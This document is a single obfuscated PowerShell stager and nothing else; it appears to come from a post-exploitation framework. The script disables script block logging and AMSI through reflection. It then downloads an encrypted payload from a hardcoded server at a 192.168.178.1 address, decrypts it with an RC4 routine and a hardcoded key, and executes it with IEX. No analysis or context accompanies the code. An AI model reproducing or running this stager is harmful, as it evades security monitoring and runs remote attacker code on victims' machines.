If($PSVeRsIOnTablE.PSVErSIon.MAjoR -gE 3){$GPF=[ref].ASsEmblY.GeTTYpe('System.Management.Automation.Utils')."GEtFiE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GeTValUE($nULL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[COlLectIonS.GenEriC.DIcTioNary[STrINg,SystEM.Object]]::NeW();$Val.ADd('EnableScriptB'+'lockLogging',0);$Val.AdD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAL}ELsE{[SCRIPtBLoCK]."GetFiE`Ld"('signatures','N'+'onPublic,Static').SetVAlUE($NUll,(NEw-ObJecT CoLLEcTiOns.GENeric.HaSHSeT[sTrIng]))}[ReF].AsseMBlY.GETTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIelD('amsiInitFailed','NonPublic,Static').SEtVALue($NULl,$TruE)};};[SystEm.NET.SerVicEPointMANaGER]::EXpect100ConTInUe=0;$wc=NeW-OBjeCt SYSTEm.NET.WEbCliENT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeaDERs.AdD('User-Agent',$u);$wc.PROXY=[SYSTEm.NEt.WebRequEst]::DeFaulTWEBProXY;$wc.PrOXy.CrEDENtiALs = [SysteM.Net.CReDEntIAlCAche]::DefAuLtNeTWORkCredENTIaLS;$Script:Proxy = $wc.Proxy;$K=[SYStEM.TEXt.EncODINg]::ASCII.GEtBytEs('m#6~k9,C+5H^t4YLr}v3DOJwU&hNIK<d');$R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXor$S[($S[$I]+$S[$H])%256]}};$ser='http://192.168.178.1:8888';$t='/news.php';$wc.HeadErs.ADD("Cookie","session=d9H/ETeDwEi0oyqmQi1LjEQ9rz4=");$datA=$WC.DoWNloADDAta($sER+$T);$iV=$dAta[0..3];$DAta=$dAtA[4..$DAta.LENGTH];-joiN[ChaR[]](& $R $dATa ($IV+$K))|IEX